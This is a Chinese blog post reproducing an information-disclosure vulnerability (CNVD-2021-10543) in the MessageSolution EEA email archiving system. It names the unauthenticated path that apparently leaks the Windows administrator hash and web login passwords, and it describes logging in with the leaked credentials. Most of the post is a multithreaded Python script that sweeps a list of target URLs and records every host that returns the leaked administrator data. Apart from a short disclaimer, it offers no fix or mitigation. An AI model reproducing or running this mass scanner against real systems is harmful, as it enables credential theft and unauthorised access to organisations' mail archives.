美文网首页
2021-03-27MessageSolution 邮件归档系统

2021-03-27MessageSolution 邮件归档系统

作者: thelostworldSec | 来源:发表于2021-03-28 00:31 被阅读0次

MessageSolution 邮件归档系统EEA 信息泄露漏洞 

CNVD-2021-10543复现

一、简介

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码

二、影响产品

MessageSolution 企业邮件归档管理系统EEA

三、漏洞复现

访问页面:

存在漏洞poc路径:

http://127.0.0.1/authenticationserverservlet/

访问地址出现密码:

利用获取账户密码登陆系统:

检测过程:

编写一个简单的检测脚本:

脚本:


#!/usr/bin/enc python

# _*_ coding: utf-8 _*_

import requests

import os

import sys

import threading

from multiprocessing.dummy import Pool

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

file = str(sys.argv[1])

write = sys.argv[2]

readfile = open(file , 'r' , encoding='UTF-8')

writefile = open(write , 'a')

ff = readfile.readlines()

def webhttp():

    for line in ff:

        try:

            line = line.rstrip("\n")

            payload = "/authenticationserverservlet/"

            url = line + payload

            req = requests.get(url, verify=False, timeout=1)

            status = req.status_code

            print(req.text)

            if 'administrator' in req.text:

                print(url+" -------------存在漏洞-------------")

                writefile.write(url)

                writefile.write('\n')

            else :

                print(url+" 不存在漏洞")

                pass

        except OSError:

            pass

def main():

    #f = threading.Thread(target=webhttp)

    pool = Pool(50)

    f = pool.apply_async(func=webhttp)

    pool.close()

    pool.join()

    readfile.close()

    writefile.close()

if __name__=="__main__":

    main()


参考:

https://mp.weixin.qq.com/s/PQaOqCem2dhp3CijN5MdKg

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

相关文章

  • 2021-03-27MessageSolution 邮件归档系统

    MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现 一、简介 M...

  • 善用邮件“归档”功能

    处理邮件占用太多时间,是不少职场人所要面对的问题。一天的时间有限,不是每封邮件都需要立刻处理,可以学着善用邮件“归...

  • Linux系统管理

    本文主要介绍了系统管理相关内容,包括压缩与归档、Linux软件包管理,任务计划、邮件功能,另外还介绍了sed命令的...

  • 关于电子邮件归档

    我处理电子邮件的习惯,在不断发生变化。 五年前,在邮箱里,我按客户名称新建文件夹,去归类该客户的邮件,一般只归收到...

  • iOS邮件发送(最新)(iOS Email)

    iOS 上的系统邮件发送相当简单,瞬间让你搞懂邮件发送。 APP站内发生邮件 跳转到系统邮件页面发生邮件 参考代码

  • iOS文件归档NSKeyedArchiver的使用

    NSKeyedArchiver可以归档系统对象,也可以归档自定义对象,不过自定义对象要实现NSCoding协议: ...

  • 外贸人必读:给国外客户打电话六宗罪

    第一罪 电话联系后不归档、不确认 很多外贸人给客户打了电话以后,并不把谈好的和需要继续谈的点整理归档,并通过邮件发...

  • CENTOS7.4搭建SMTP邮件服务器

    1. 邮件系统的简单介绍: 电子邮件系统基于邮件协议来完成电子邮件的传输,常见的邮件协议有下面这些。 简单邮件传输...

  • 工作归档系统学习-时间维度与事件维度

    工作归档系统学习-时间维度与事件维度 学习了永澄的工作归档系统。感觉这套东西正是目前所欠缺的。 时间维度-之前自己...

  • PACS发展

    影像归档与通信系统(Picture Archiving and Communication System,PACS...

网友评论

      本文标题:2021-03-27MessageSolution 邮件归档系统

      本文链接:https://www.haomeiwen.com/subject/mhbyhltx.html